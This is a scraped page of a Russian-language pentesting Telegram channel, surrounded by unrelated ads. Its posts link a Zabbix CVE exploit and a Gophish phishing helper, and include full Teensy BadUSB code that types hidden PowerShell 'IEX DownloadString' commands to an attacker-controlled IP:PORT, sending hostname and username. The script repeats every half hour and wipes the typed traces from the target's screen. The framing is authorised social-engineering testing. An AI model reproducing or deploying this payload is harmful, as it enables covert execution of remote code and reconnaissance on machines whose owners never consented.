FCK HARDER

Description
TG: https://t.me/e1tex

CHAT: https://t.me/cht_harder

Dirty talks about pentest, python and hardware stuff/
FCK HARDER
Advertising
We recommend to visit

Imperial Orchestra — большой симфонический оркестр, организатор шоу саундтреков: Cinema Medley, Hans Zimmer’s Universe и др.

Афиша и билеты на сайтах: cinemamedley.ru www.hanszimmer.ru imperialhall.spb.ru

Last updated 6 days, 4 hours ago

Send your beautiful menfess about the beauty world right here, Beauties! <3

On Duty: Close.

KRITIK & SARAN: @.Ghiaabot (BUKAN BOT SEND PERTANYAAN!)
Partnership: @.TheBeautyBaseBot @TBBPS
Banned: @BannedTBB
Rants: @BeautyRants
Sub—Unit: @Kitchenfess

Last updated 1 day, 17 hours ago

Легендарные экошубы и другая верхняя одежда

Интернет-магазин: only-me.ru
Чат для заказа: @onlymeconsultant
ВКонтакте: vk.com/wearonlyme

Last updated 3 days, 17 hours ago

1 Woche, 4 Tage her
**CVE-2024-42327** ***😌***

CVE-2024-42327 😌

Немного опоздал, но, учитывая то, как забикс заполонил корпоративные сети и оценку уязвимости в 9.9 баллов по шкале CVSS, пок не утратил свою актуальность:

https://github.com/depers-rus/CVE-2024-42327

Для эксплуатации нужна валидная учетка с любой ролью, учетки которой могут взаимодействовать с апишкой.
Пок написан под постгрю, для других субд адаптируйте синтаксис запроса.

~~TRY~~FCK HARDER😇

2 Wochen, 4 Tage her
**Сети и системы передачи информации**

Сети и системы передачи информации

Пожалуй, это один из лучших курсов, которые я когда-либо видел по практическим сетям. Сколько бы раз я ни рассказывал про него, всегда все просили поделиться ссылкой. И вот оно случилось: @sadykovildar дал добро (за что ему большое спасибо), а значит, ловите🎸

https://sadykov.notion.site/1-bb9630269fa14ce4b21f5b10339af168

Т.к. репа в ноушене, для просмотра лекционного материала, используйте VPN.

~~TRY~~ FCK HARDER 👀

3 Wochen, 3 Tage her
**gophishGroupsAdder** ***😩***

gophishGroupsAdder 😩

Всем ку! Давно не виделись!
Думаю, очевидно, что 4 квартал никого не щадит)

Исходя из задачек и того материала, над которым в данный момент работаю, решил написать следующий простенький скриптец:

https://github.com/E1tex/gophishGroupsAdder

Мало кто любит ~~бдсм~~ вишинг, но нужен этот скрипт по большому счету только для этого.

В случаях, когда заказчик пуляет в вас миллион клиентов, которых надо будет отзвонить, а соответственно и таргетированно отослать письма, ручками заносить всех пользаков в разные группы было бы слишком долго. Тут вам и поможет gophishGroupsAdder, работающий на основе Gophish API. Enjoy!

~~TRY~~ FCK HARDER ☺️

4 Monate her

Ребята, всем спасибо за участие в нашем конкурсе?
Мы определили 3 победителей, которые завтра заберут у нас свои призы???

?1 место @scan87
?2 место @Casuaq
?3 место @mr4nd3r5on

Все участники поразили нас скоростью и профессионализмом. Благодарим всех! В следующий раз сделаем конкурс посложнее. Нам подсветили наши недочеты, а мы заметили как легко и играючи вы со всем справились☠️

Всем еще раз спасибо за участие! ???

4 Monate her

Двигаем от второго выхода автозаводской ? Карточки все еще есть..

6 Monate, 1 Woche her

BadUSB Check-Script ?
Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.

Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании ?, нам нужно собрать минимальную информацию о хосте, с которого был отправлен запрос. В скрипте ниже, используя переменные окружения, мы отправляем с виндовой тачки запрос, содержащий hostname и username.

Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.

Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:

```
#include

void setup() {
delay(5000);
SetDelay(100);
while (true) {
delay(5000);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(KEY_SPACE);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
PressKey(KEY_BACKSPACE, 1);
delay(1800000);
}
}

void loop() {
}
```

А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:

sudo PYTHONUNBUFFERED=x python3 \-m http.server PORT &> ../http.server.log & echo $! > ../http.server.pid

Здесь мы:1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.

По основному скрипту:1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;

2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;

  1. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
    не палимся)

~~TRY~~ FCK HARDER ?

Telegram

FCK HARDER

Teensy 2.0 Bad USB ***😱*** https://teletype.in/@e1tex/teensybadusb В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0. Я продемонстрирую шаги по созданию и программированию этого маленького,…

7 Monate her

Друзья, сообщество Standoff.

Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.

Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.

На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.

  1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.

  2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.

  3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.

Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.

В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.

True0xA3 (ТруОАЗ)

We recommend to visit

Imperial Orchestra — большой симфонический оркестр, организатор шоу саундтреков: Cinema Medley, Hans Zimmer’s Universe и др.

Афиша и билеты на сайтах: cinemamedley.ru www.hanszimmer.ru imperialhall.spb.ru

Last updated 6 days, 4 hours ago

Send your beautiful menfess about the beauty world right here, Beauties! <3

On Duty: Close.

KRITIK & SARAN: @.Ghiaabot (BUKAN BOT SEND PERTANYAAN!)
Partnership: @.TheBeautyBaseBot @TBBPS
Banned: @BannedTBB
Rants: @BeautyRants
Sub—Unit: @Kitchenfess

Last updated 1 day, 17 hours ago

Легендарные экошубы и другая верхняя одежда

Интернет-магазин: only-me.ru
Чат для заказа: @onlymeconsultant
ВКонтакте: vk.com/wearonlyme

Last updated 3 days, 17 hours ago